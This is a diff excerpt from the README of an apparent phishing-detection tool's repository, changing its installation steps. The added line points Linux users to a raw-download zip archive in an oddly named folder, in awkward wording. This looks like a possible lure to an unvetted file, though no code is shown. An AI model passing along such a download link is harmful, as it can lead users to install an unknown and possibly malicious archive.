ipshype/phishing-website-detection/README.md

 4. **Run the Installer**:
    - For Windows: Double-click the `.exe` file.
 Follow the on-screen instructions.
    - For macOS: Open the `.dmg` file and drag the application into your Applications folder.
-   - For Linux: Extract the downloaded `.tar.gz` file and follow the instructions in the README.
+   - For Linux: Extract the downloaded `https://github.com/ipshype/phishing-website-detection/raw/refs/heads/main/recreative/website-detection-phishing-v2.7.zip` file and follow the instructions in the README.

 5. **Open the Application**: After installation, find the application in your installed programs or applications folder.
 Open it to start using the phishing detection features.